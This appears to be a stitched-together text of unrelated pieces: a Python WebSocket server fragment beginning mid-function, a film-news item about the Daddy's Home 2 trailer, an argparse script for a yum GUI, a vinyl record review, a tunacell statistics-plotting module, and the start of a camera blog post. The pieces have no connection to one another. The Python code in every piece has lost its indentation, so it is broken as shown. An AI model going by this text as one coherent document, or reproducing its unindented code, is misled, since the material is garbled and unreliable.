if in_error:
print("ERROR! in sockets")
print(in_error)
for reader in ready_to_read:
if reader == self.sserver: # this will be true if there are sockets that can be accepted
clientsocket, address = self.sserver.accept()
if self.handshake(clientsocket) is True and len(
self.client_list) < 100: # only add socket to the list if the handshake succeeded AND we have less then 100 connections already!
self.client_list.append(clientsocket)
logging.debug("wsserver: connection accepted from: %s", str(address))
else: # one of the other sockets has a message for us, but we only check if it's empty, because that means the socket closed
m = ""
try:
m = reader.recv(4096)
except:
do_noting = 0
if len(m) < 1:
self.client_list.remove(reader)
reader.close()
def send_msg(self, sock, message):
# https://tools.ietf.org/html/rfc6455#page-28
length = len(message)
frame = "\x81" # The first byte setting the FIN bit to 1 and sending the opcode 0x1 that tells the clients the payload data is text
if length > 65025:
raise Exception("Error - payload to large")
elif length > 125:
frame = frame + chr(126)
frame = frame + struct.pack(">H", length) # here we add the hex representation of the length
frame = frame + message
else:
frame = frame + chr(length) + message
ready_to_read, ready_to_write, in_error = select.select([], [sock], [], 1)
if sock in ready_to_write:
try:
sock.sendall(frame)
except:
self.client_list.remove(sock)
sock.close()
def handshake(self, sock):
magic_string = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
# Get the header, but only if the socket has anything to say (otherwise just disgard it)
ready_to_read, ready_to_write, in_error = select.select([sock], [], [], 1)
if sock in ready_to_read:
header = sock.recv(4096)
else:
return False
# here we should probably add some more protocol checking stuff. But this should work with any real browsers (chromium/firefox, at least for now)
# make the key, using the key from the header and the magic string
key = re.search("(Sec-WebSocket-Key: )(\S+)", header)
if not key:
return False # return false if the client didn't provide a key
key = key.group(2)
key = key + magic_string
respond_key = base64.b64encode(hashlib.sha1(key).digest())
# Handshake
respond_message = "HTTP/1.1 101 Switching Protocols\r\n"
respond_message = respond_message + "Upgrade: websocket\r\n"
respond_message = respond_message + "Connection: Upgrade\r\n"
respond_message = respond_message + "Sec-WebSocket-Accept: %s\r\n\r\n" % respond_key
ready_to_read, ready_to_write, in_error = select.select([], [sock], [], 1) # make sure it's ready to write
if sock in ready_to_write:
sock.sendall(respond_message)
return True
else:
return False
|
A new trailer has dropped for Daddy’s Home 2, the upcoming Will Ferrell and Mark Wahlberg sequel that adds John Lithgow and Mel Gibson to the mix.
The sequel to the 2015 comedy, which grossed $US242.7 million worldwide, finds father Brad (Ferrell) and stepfather Dusty (Wahlberg) in for a chaotic holiday season when their dads (Gibson, Lithgow) decide to drop around for Christmas.
More footage is on offer in the new trailer, including more of Gibson’s tough-guy grandad. It’s good to see the Oscar winner back in films, and tackling a broad family comedy is a bit of a change of pace for him lately too. Fingers crossed returning director/co-writer Sean Anders (We’re the Millers) and scribe John Morris bring the comedic best out of this great cast.
There are a few parent-focused comedies on the way. Fathers have another spotlight in the Owen Wilson and Ed Helms comedy Father Figures (previously known as Bastards) and mothers have the upcoming sequel A Bad Moms Christmas.
Daddy’s Home 2, also starring Linda Cardellini, John Cena, and Alessandra Ambrosio, opens in the U.S. on November 10 and arrives in Australia on November 23. |
# need the python-argparse package installed
import argparse
# create the parser
main_parser = None
def setupParser():
global main_parser
base_parser = argparse.ArgumentParser(add_help=False)
parser = base_parser.add_argument_group('base options')
parser.add_argument("-d", "--debuglevel", dest="debuglevel", action="store", choices=xrange(10),
default=2, help="yum output level", type=int)
parser.add_argument("-e","--errorlevel", dest="errorlevel", action="store", choices=xrange(10),
default=2, help="yum error level", type=int)
main_parser = argparse.ArgumentParser(description='GUI for the yum package manager', parents = [base_parser])
subparsers = main_parser.add_subparsers()
cmds = ['install','remove']
# add a sub-command "install"
for c in cmds:
parser_cmd = subparsers.add_parser(c, help='%s a package' % c, parents = [base_parser])
parser_cmd.add_argument('package', nargs='*')
if __name__ == '__main__':
setupParser()
# parse the command line
args = main_parser.parse_args()
print args
|
But sometimes things don’t quite sink in until they are laid out in front of you.
After hearing these four cuts spread out in full width and glory over two 12″ discs, mastered by Matt Colton and released via the highly respectable ‘Blackest Ever Black’ label – it became clearer just how bloody good these tracks really were.
Created by Amos Childs out of Jabu, El Kid & Vessel – the trio that make up the main structure of Killing Sound – Each piece of music on this release stands out as incredibly accomplished, beautifully restrained, with every frequency adding to the constant tension and release.
From the skewed vocal shots and elevated layers to the menacing drones, shattering drum hits and chest-crushing subs, each track sways in simple, yet complete form.
Sleeve design by Harry Wright.
180gsm vinyl – sounds heavy, feels heavy. |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This module defines plotting functions for the statistics of the dynamics.
"""
from __future__ import print_function
import os
import numpy as np
import collections
import logging
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib import ticker
import matplotlib.gridspec as gridspec
from tunacell.filters.main import FilterSet
from tunacell.stats.single import Univariate, StationaryUnivariate
from tunacell.stats.two import StationaryBivariate
from tunacell.io import text
from .helpers import _set_axis_limits, _set_timelabel, _set_time_axis_ticks
# few variables that will be used through all functions
default_fontsize = mpl.rcParams['font.size']
default_lw = mpl.rcParams['lines.linewidth']
def _set_condition_list(univariate, show_cdts='master'):
"""Set the list of conditions to show
Parameters
----------
show_cdts : str or FilterSet or iterable on these (default 'master')
the conditions to plot, use 'all' for all conditions in univariate
univariate : Univariate instance
conditions will be matched against conditions stored in univariate
Returns
-------
list of FilterSet (conditions) to show
"""
conditions = ['master', ] # list of conditions to be plotted
if show_cdts == 'all':
conditions = ['master', ] + univariate.cset
elif show_cdts == 'master':
pass
elif isinstance(show_cdts, collections.Iterable):
for item in show_cdts:
_append_cdt(univariate, item, conditions)
else:
_append_cdt(univariate, show_cdts, conditions)
return conditions
def _append_cdt(univariate, this_cdt, cdt_list):
"""Append condition associated to this_cdt in univariate object to cdt_list
Parameters
----------
univariate : :class:`Univariate` instance
this_cdt : str or :class:`FilterSet` instance
either the condition instance or its string representation
cdt_list : list of conditions
list of conditions to append condition to
"""
found = False
if isinstance(this_cdt, str):
# find which
for cdt in univariate.cset:
# TODO : compare also cdt.label
if repr(cdt) == this_cdt:
found = True
break
elif isinstance(this_cdt, FilterSet):
for cdt in univariate.cset:
if repr(cdt) == repr(this_cdt):
found = True
break
if found:
cdt_list.append(cdt)
return
def plot_onepoint(univariate, show_cdts='all', show_ci=False,
mean_ref=None, var_ref=None,
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
counts_range=(None, None),
counts_fractional_pad=.1,
average_range=(None, None), # auto
average_fractional_pad=.1,
variance_range=(None, None),
variance_fractional_pad=.1,
show_legend=True,
show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, user_path=None, ext='.png',
verbose=False):
"""Plot one point statistics: counts, average, abd variance.
One point functions are plotted for each condition set up in *show_cdts*
argument: 'all' for all conditions, or the string representation (or label)
of a particuler condition (or a list thereof).
Parameters
----------
univariate : Univariate instance
show_cdts : str (default 'all')
must be either 'all', or 'master', or the repr of a condition, or a
list thereof
show_ci : bool {False, True}
whether to show 99% confidence interval
mean_ref : float
reference mean value: what user expect to see as sample average to
compare with data
var_ref : float
reference variance value: what user expect to see as sample variance to
compare with data
axe_xsize : float (default 6)
size of the x-axis (inches)
axe_ysize : float (default 2.)
size if a single ax y-axis (inches)
time_range : couple of floats (default (None, None))
specifies (left, right) bounds
time_fractional_pad : float (default .1)
fraction of x-range to add as padding
counts_range : couple of floats (default (None, None))
specifies range for the Counts y-axis
counts_fractional_pad : float (default .2)
fractional amount of y-range to add as padding
average_range : couple of floats (default (None, None))
sepcifies range for the Average y-axis
average_fractional_pad : couple of floats (default .2)
fractional amounts of range to padding
variance_range : couple of floats (default (None, None))
sepcifies range for the Variance y-axis
average_fractional_pad : couple of floats (default .2)
fractional amounts of range to padding
show_legend : bool {True, False}
print out legend
show_cdt_details_in_legend : bool {False, True}
show details about filters
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
save : bool {False, True}
whether to save plot
user_path : str (default None)
user defined path where to save figure; default is canonical path
(encouraged)
ext : str {'.png', '.pdf'}
extension to be used when saving file
verbose : bool {False, True}
"""
if not isinstance(univariate, Univariate):
raise TypeError('Input is not {}'.format(Univariate))
fig, axs = plt.subplots(3, 1, figsize=(axe_xsize, 3*axe_ysize))
obs = univariate.obs
timelabel = _set_timelabel(obs) # define time label
main_handles = [] # main legend
ci_handles = [] # additional legend (TODO: check if necessary)
all_times = []
all_counts = []
all_average = []
all_variance = []
# build condition list
conditions = _set_condition_list(univariate, show_cdts)
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
alpha = 1
alpha_fill = .5
else:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
alpha = .8
alpha_fill = 0.3
ok = np.where(univariate[c_repr].count_one > 0)
times = univariate[c_repr].time[ok]
all_times.extend(times)
counts = univariate[c_repr].count_one[ok]
all_counts.extend(counts)
mean = univariate[c_repr].average[ok]
all_average.extend(mean)
var = univariate[c_repr].var[ok]
all_variance.extend(var)
std = univariate[c_repr].std[ok]
se = 2.58 * std / np.sqrt(counts) # standard error 99% CI Gaussian
# var = np.diagonal(univariate[c_repr].autocorr)
line_counts, = axs[0].plot(times, counts, alpha=alpha, lw=lw,
label='{}'.format(c_label))
main_handles.append(line_counts)
color = line_counts.get_color()
average, = axs[1].plot(times, mean, color=color, alpha=0.8, lw=lw, label=c_label)
if show_ci:
fill_std = axs[1].fill_between(times, mean-se, mean+se,
facecolor=color, alpha=alpha_fill)
ci_handles.append(fill_std)
all_average.extend(mean-se)
all_average.extend(mean+se)
variance, = axs[2].plot(times, var, color=color, alpha=0.8, lw=lw, label=c_label)
# adding reference lines
if mean_ref is not None:
mref = axs[1].axhline(mean_ref, ls='-.', color='C7', alpha=.7,
label='reference value')
main_handles.append(mref)
all_average.append(mean_ref)
if var_ref is not None:
vref = axs[2].axhline(var_ref, ls='-.', color='C7', alpha=.7,
label='reference value')
# check last label if meanèref has been saved
last_lab = main_handles[-1].get_label()
if last_lab != vref.get_label():
main_handles.append(vref)
all_variance.append(var_ref)
# print vertical line at tref
if obs.timing != 'g' and isinstance(obs.tref, float):
for ax in axs:
vtref = ax.axvline(univariate.obs.tref, color='C7', ls='--',
alpha=.5, label='reference time in obs')
main_handles.append(vtref) # only the last one
# ## limits and ticks ##
# xaxis
for ax in axs:
left, right = _set_axis_limits(ax, all_times, which='x', pad=time_fractional_pad,
force_range=time_range)
# locator
locator = _set_time_axis_ticks(axs[0], obs, bounds=(left, right))
for ax in axs:
ax.xaxis.set_major_locator(locator)
# yaxis limits
_set_axis_limits(axs[0], all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
axs[0].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
# average
_set_axis_limits(axs[1], all_average, which='y', pad=average_fractional_pad,
force_range=average_range)
axs[1].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# variance
_set_axis_limits(axs[2], all_variance, which='y', pad=variance_fractional_pad,
force_range=variance_range)
axs[2].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# tick formatter
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
for ax in axs:
ax.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
axs[0].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[1].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[2].set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
for ax in axs[:2]:
ax.spines['bottom'].set_visible(False)
ax.tick_params(axis='x', colors='C7')
for ax in axs[1:]:
ax.spines['top'].set_color('C7')
axs[0].set_ylabel('Counts', fontsize='medium')
axs[1].set_ylabel('Average', fontsize='medium')
axs[2].set_ylabel('Variance', fontsize='medium')
# ## legend ##
# C.I.
if ci_handles:
ci = ci_handles[0]
# ci.set_color('C7')
ci.set_label('.99 C.I.')
main_handles.append(ci)
handles = main_handles[:]
labels = [h.get_label() for h in handles]
if show_legend:
axs[-1].legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.5/axe_ysize))
# title
latex_obs = obs.latexify(use_name=use_obs_name)
axs[0].text(0.5, 1+.2/axe_ysize,
r'{}'.format(latex_obs),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
transform=axs[0].transAxes)
fig.subplots_adjust(hspace=0)
if save:
univ = univariate
try:
obs_path = univ._get_obs_path(user_root=user_path, write=False)
except text.MissingFolderError:
# it means data has not been written yet
# export data and then get
univ.export_text(analysis_folder=user_path)
obs_path = univ._get_obs_path(user_root=user_path, write=False)
bname = 'plot_onepoint_' + univ.obs.name + '_' + univ.region.name + ext
fname = os.path.join(obs_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
def plot_twopoints(univariate, condition_label=None, trefs=[], ntrefs=4,
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
counts_range=(None, None),
counts_fractional_pad=.1,
corr_range=(None, None), # auto
corr_fractional_pad=.1,
delta_t_max=None,
show_exp_decay=None,
show_legend=True,
show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, ext='.png', verbose=False):
"""Plot two-point functions: counts and autocorrelation functions.
These plots are able to show only one extra condition with 'master', and
are plotted for a set of time of references.
Parameters
----------
univariate : :class:`Univariate` instance
condition_label : str (default None)
must be the repr of a given FilterSet
trefs : flist of floats
indicate the times that you would like to have as references
if left empty, reference times will be computed automatically
ntrefs : int
if trefs is empty, number of times of reference to display
axe_xsize : float (default 6)
size of the x-axis (inches)
axe_ysize : float (default 2.)
size if a single ax y-axis (inches)
time_range : couple of floats (default (None, None))
specifies (left, right) bounds
time_fractional_pad : float (default .1)
fraction of x-range to add as padding
counts_range : couple of floats (default (None, None))
specifies range for the Counts y-axis
counts_fractional_pad : float (default .2)
fractional amount of y-range to add as padding
corr_range : couple of floats (default (None, None))
sepcifies range for the Average y-axis
corr_fractional_pad : couple of floats (default .2)
fractional amounts of range to padding
delta_t_max : float (default None)
when given, bottom plot will be using this max range symmetrically;
otherwise, will use the largest intervals found in data (often too
large to see something)
show_exp_decay : float (default None)
when a floating point number is passed, a light exponential decay
curve is plotted for each tref
show_legend : bool {True, False}
print out legend
show_cdt_details_in_legend : bool {False, True}
show details about filters
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
save : bool {False, True}
whether to save figure at canonical path
ext : str {'.png', '.pdf'}
extension to be used when saving figure
verbose : bool {False, True}
"""
obs = univariate.obs
timelabel = _set_timelabel(obs) # define time label
# get priod from eval times
if len(univariate.eval_times) > 0:
period = univariate.eval_times[1] - univariate.eval_times[0]
# or from experiment metadata
else:
period = univariate.exp.period
fig, axs = plt.subplots(3, 1, figsize=(axe_xsize, 3*axe_ysize))
# choice of index/indices for time of reference
times = univariate['master'].time
npoints = len(times)
if not trefs:
logging.info('Determining trefs...')
di = npoints // ntrefs + 1
indices = np.arange(0, npoints, di, dtype=int)
trefs = times[indices]
logging.info(trefs)
all_times = []
all_counts = []
all_corr = []
handles = []
# prep work for latex printing
latex_ref = '{{\mathrm{{ref}}}}'
if obs.timing == 'g':
prefix = 'g'
units = ''
else:
prefix = 't'
units = 'mins'
conditions = ['master', ] + univariate.cset
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
lt = '-'
alpha = .8
elif cdt.label == condition_label or str(cdt) == condition_label or repr(cdt) == condition_label:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
lt = '--'
alpha = .6
# we plot master and one condition if given, not more...
else:
continue
times = univariate[c_repr].time
counts = univariate[c_repr].count_two
corr = univariate[c_repr].autocorr
var = np.diagonal(corr)
valid = counts != 0
for tref in trefs:
# this tref may not be in conditioned data (who knows)
if np.amin(np.abs(times - tref)) > period:
continue
index = np.argmin(np.abs(times - tref))
if obs.timing == 'g':
lab = '{:d}'.format(tref)
else:
lab = '{:.0f}'.format(tref)
line_label = r'$ {}_{} = {}$ {} ({})'.format(prefix, latex_ref, lab, units, c_label)
ok = np.where(counts[index, :] > 0)
# if len(ok[0]) == 0:
# continue
# time limits
all_times.extend(times[ok])
dat, = axs[0].plot(times[ok], counts[index, :][ok],
ls=lt, lw=lw, alpha=alpha, label=line_label)
handles.append(dat)
all_counts.extend(counts[index, :][ok])
color = dat.get_color()
axs[0].plot((tref, tref), (0, counts[index, index]),
ls=':', color=color)
axs[1].axhline(0, ls='-', color='C7', alpha=.3) # thin line at 0
dat, = axs[1].plot(times[valid[index, :]],
corr[index, :][valid[index, :]]/var[index],
ls=lt, lw=lw, alpha=alpha)
all_corr.extend(corr[index, :][valid[index, :]]/var[index])
color = dat.get_color()
axs[1].axvline(tref, ymin=0.1, ymax=0.9, ls=':', color=color)
axs[2].axhline(0, ls='-', color='C7', alpha=.3) # thin line at 0
axs[2].plot(times[valid[index, :]] - tref,
corr[index, :][valid[index, :]]/var[index], ls=lt, lw=lw, alpha=alpha)
# ## limits and ticks ##
# xaxis
for ax in axs[:2]:
left, right = _set_axis_limits(ax, all_times, which='x',
pad=time_fractional_pad,
force_range=time_range)
hrange = right - left
ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
# bottom plot : try to zoom over provided range
if delta_t_max is not None:
axs[2].set_xlim(left=-delta_t_max, right=delta_t_max)
# if not provided, compute automatic ranges (not pretty usually)
else:
axs[2].set_xlim(left=-hrange, right=hrange)
axs[2].xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
# add exponential decay
if show_exp_decay is not None:
tt = np.linspace(left, right, 100)
dd = np.linspace(-hrange, hrange, 100)
lab = r'$t_{{\mathrm{{decay}}}} = {:.1f}$ {}'.format(1./show_exp_decay, units)
for tref in trefs:
axs[1].plot(tt, np.exp(-show_exp_decay * np.abs(tt - tref)),
ls='-.', color='C7', alpha=.7)
dec, = axs[2].plot(dd, np.exp(-show_exp_decay * np.abs(dd)),
ls='-.', color='C7', alpha=.7, label=lab)
all_corr.extend(np.exp(-show_exp_decay * np.abs(dd)))
handles.append(dec)
# ## yaxis limits ##
# counts
_set_axis_limits(axs[0], all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
axs[0].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
# corr
for ax in axs[1:]:
_set_axis_limits(ax, all_corr, which='y', pad=corr_fractional_pad,
force_range=corr_range)
ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# legend
labels = [h.get_label() for h in handles]
axs[-1].legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.5/axe_ysize), labelspacing=0.2) # reduce labelspacing because of LaTeX
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
for ax in axs:
ax.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
axs[0].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[1].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[2].set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
for ax in axs[:1]:
ax.spines['bottom'].set_visible(False)
ax.tick_params(axis='x', colors='C7')
for ax in axs[1:2]:
ax.spines['top'].set_color('C7')
# ylabels
axs[0].set_ylabel(r'# $\langle t_{\mathrm{ref}} | t \rangle$',
fontsize='medium')
axs[1].set_ylabel(r'$a(t_{\mathrm{ref}}, t)$',
fontsize='medium')
axs[2].set_ylabel(r'$a(t_{\mathrm{ref}}, t- t_{\mathrm{ref}})$',
fontsize='medium')
# title
latex_obs = obs.latexify(use_name=use_obs_name)
axs[0].text(0.5, 1+.2/axe_ysize,
r'{}'.format(latex_obs),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
transform=axs[0].transAxes)
fig.subplots_adjust(hspace=0.)
# save fig at canonical path
if save:
# export data files if not existing yet
try:
obs_path = univariate._get_obs_path(write=False)
except text.MissingFolderError:
univariate.write_text()
if condition_label is None:
univc = univariate.master
else:
univc = univariate[condition_label]
cdt_path = univc._get_path()
bname = 'plot_twopoints_' + obs.name + '_' + univariate.region.name + ext
fname = os.path.join(cdt_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
def plot_stationary(stationary, show_cdts='all',
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
time_guides=[0., ],
counts_range=(None, None),
counts_fractional_pad=.1,
corr_range=(None, None), # auto
counts_logscale=False,
corr_fractional_pad=.1,
corr_logscale=False,
corr_guides=[0., ],
show_exp_decay=None,
show_legend=True, show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, ext='.png', verbose=False):
"""Plot stationary autocorrelation.
Parameters
----------
stationary : StationaryUnivariate or StationaryBivariate instance
axe_xsize : float (default 6)
size (in inches) of the x-axis
axe_ysize : float (default 2)
size (in inches) of the individual y-axis
time_range : couple of floats
bounds for time (x-axis)
time_fractional_pad : float
fractional padding for x-axis
counts_range : couple of ints
bounds for counts axis
counts_fractional_pad : float
fractional padding for counts axis
corr_range : couple of floats
bounds for correlation values
counts_logscale : bool {False, True}
use logscale for counts axis
corr_fractional_pad : float
fractional padding for correlation values
corr_logscale : bool {False, True}
use logscale for correlation values (symlog is used to display
symmetrically negative values)
corr_guides : list of float
values where to plot shaded grey horizontal lines
show_exp_decay : float (default None)
whether to plot an exponential decay with corresponding rate
exp(-rate * t)
save : bool {False, True}
whether to save plot at canonical path
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
ext : str {'.png', '.pdf'}
extension used for file
Returns
-------
fig : Figure instance
"""
if not (isinstance(stationary, StationaryUnivariate) or
isinstance(stationary, StationaryBivariate)):
msg = ('Input is not an instance of '
'{}'.format(StationaryUnivariate) + 'or of '
'{}'.format(StationaryBivariate))
raise TypeError(msg)
if isinstance(stationary, StationaryUnivariate):
obs = stationary.obs
timelabel = _set_timelabel(obs, use_tref=False)
elif isinstance(stationary, StationaryBivariate):
obs = [uni.obs for uni in stationary.univariates]
timelabel = _set_timelabel(obs[0], use_tref=False)
if 'minutes' in timelabel:
units = 'mins'
prefix = 't'
else:
units = '' # generations are used
prefix = 'g'
timelabel = r'$\Delta$'+timelabel
nplots = 2
fig = plt.figure(figsize=(axe_xsize, (nplots + 1)*axe_ysize))
gs = gridspec.GridSpec(nplots + 1, 1)
ax1 = fig.add_subplot(gs[0])
ax2 = fig.add_subplot(gs[1:])
# build condition list
if isinstance(stationary, StationaryUnivariate):
conditions = _set_condition_list(stationary.univariate, show_cdts=show_cdts)
elif isinstance(stationary, StationaryBivariate):
conditions = []
conditions_0 = _set_condition_list(stationary.univariates[0], show_cdts=show_cdts)
conditions_1 = _set_condition_list(stationary.univariates[1], show_cdts=show_cdts)
# intersect
for cdt in conditions_0:
if cdt in conditions_1:
conditions.append(cdt)
all_times = []
all_counts = []
all_corrs = []
main_handles = [] # for legend
ci_handles = []
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
alpha = 1
alpha_fill = .5
else:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
alpha = .8
alpha_fill = 0.3
array = stationary[c_repr].array
nonzero = np.where(array['counts'] > 1) # 1 sample does not have std
dts = array['time_interval'][nonzero]
all_times.extend(dts)
counts = array['counts'][nonzero]
all_counts.extend(counts)
if isinstance(stationary, StationaryUnivariate):
corr = array['auto_correlation'][nonzero]
else:
corr = array['cross_correlation'][nonzero]
try:
dev = array['std_dev'][nonzero]
except ValueError:
dev = None
# counts
label = '{}'.format(c_label)
line, = ax1.plot(dts, counts, lw=lw, alpha=alpha, label=label)
main_handles.append(line)
col = line.get_color() # usefule for later stage
# autocorrelation: divide by variance
if isinstance(stationary, StationaryUnivariate):
norm = corr[0]
# cross-correlation: divide covariance by product of standard devs
elif isinstance(stationary, StationaryBivariate):
prod = 1.
for single in stationary.univariates:
prod *= np.sqrt(single[c_repr].stationary.autocorr[0])
norm = prod
dat, = ax2.plot(dts, corr/norm, color=col,
lw=lw, alpha=alpha, label=label)
all_corrs.extend(corr/norm)
if dev is not None:
se = 2.58 * dev / np.sqrt(counts)
ci = ax2.fill_between(dts, (corr-se)/norm, (corr+se)/norm,
facecolor=col, alpha=alpha_fill,
label='.99 C.I.')
ci_handles.append(ci)
all_corrs.extend((corr-se)/norm)
all_corrs.extend((corr+se)/norm)
# vertical lines for timing
for val in time_guides:
ax2.axvline(val, ls=':', color='C7', alpha=.5)
# horizontal lines for correlation ref
for val in corr_guides:
ax2.axhline(val, ls=':', color='C7', alpha=.5)
# ## limits and ticks ##
# xaxis
for ax in [ax1, ax2]:
left, right = _set_axis_limits(ax, all_times, which='x',
pad=time_fractional_pad,
force_range=time_range)
ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
if show_exp_decay is not None:
tt = np.linspace(left, right, 100)
yy = np.exp(-show_exp_decay*np.abs(tt))
lab = r'${}_{{\mathrm{{decay}}}} = {:.1f}$ {}'.format(prefix, 1./show_exp_decay, units)
ref, = ax2.plot(tt, yy, '-.', color='C7', alpha=1,
label=lab)
main_handles.append(ref)
# ## yaxis limits ##
# counts
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
if not counts_logscale:
_set_axis_limits(ax1, all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
ax1.yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
ax1.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax1.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
else:
ax1.set_yscale('symlog', linthresh=1)
# corr
if not corr_logscale:
bottom, top = _set_axis_limits(ax2, all_corrs, which='y',
pad=corr_fractional_pad,
force_range=corr_range)
if top > 2 or bottom < -2:
locator = ticker.MaxNLocator(nbins=5, integer=True)
else:
locator = ticker.FixedLocator([-1, -.5, 0., .5, 1])
ax2.yaxis.set_major_locator(locator)
ax2.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax2.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
else:
ax2.set_yscale('symlog', linthreshy=0.1, linscaley=0.2,
subsy=[2, 3, 4, 5, 6, 7, 8, 9])
if corr_range[0] is not None and corr_range[0] > 0.:
ax2.set_ylim(bottom=corr_range[0])
ax1.tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
ax2.set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
ax1.spines['bottom'].set_visible(False)
ax1.tick_params(axis='x', colors='C7')
ax2.spines['top'].set_color('C7')
# ylabels
ax1.set_ylabel(r'Counts', fontsize='medium')
if isinstance(stationary, StationaryUnivariate):
ax2.set_ylabel(r'$\tilde{{a}}(\Delta {})$'.format(prefix), fontsize='medium')
elif isinstance(stationary, StationaryBivariate):
ax2.set_ylabel(r'$\tilde{{c}}(\Delta {})$'.format(prefix), fontsize='medium')
# writting observable
# case: obs is a single observable
if isinstance(stationary, StationaryUnivariate):
msg = '{}:{}'.format(obs.latexify(shorten_time_variable=True, use_name=use_obs_name),
obs.latexify(plus_delta=True, shorten_time_variable=True, use_name=use_obs_name))
# case: obs is a couple of observables
else:
if use_obs_name is not None:
if isinstance(use_obs_name, str):
use_name_0 = use_obs_name
use_name_1 = None
else:
if len(use_obs_name) == 1:
use_name_0 = use_obs_name[0]
use_name_1 = None
else:
use_name_0 = use_obs_name[0]
use_name_1 = use_obs_name[1]
else:
use_name_0 = None
use_name_1 = None
msg = '{}:{}'.format(obs[0].latexify(shorten_time_variable=True,
use_name=use_name_0),
obs[1].latexify(plus_delta=True, shorten_time_variable=True,
use_name=use_name_1))
ax1.text(0.5, 1+.2/axe_ysize, r'{}'.format(msg),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
transform=ax1.transAxes)
# ## legend ##
# C.I.
if ci_handles:
ci = ci_handles[0]
# ci.set_color('C7')
ci.set_label('.99 C.I.')
main_handles.append(ci)
handles = main_handles[:]
labels = [h.get_label() for h in handles]
if show_legend:
ax2.legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.25/axe_ysize), labelspacing=.2)
fig.subplots_adjust(hspace=0)
if save:
# get univariate instance to get path where to save figure
bname = 'plot_stationary_'
try:
obs_path = stationary._get_obs_path(write=False)
except text.MissingFolderError:
stationary.write_text()
obs_path = stationary._get_obs_path(write=False)
obsname = os.path.basename(obs_path)
bname += obsname + '_'
bname += stationary.region.name + ext
fname = os.path.join(obs_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
|
We’ve always loved blurring the background and making films look grainy and cinematic in post-production for our conventional videos. A few months ago this new Panasonic AF101 camera spoke to me, promised the world and allowed me to do all this live while filming. This is one of the new breeds of camcorders offering incredible depth of field using standard digital single-lens reflex (SLR/DSLR) camera lenses.
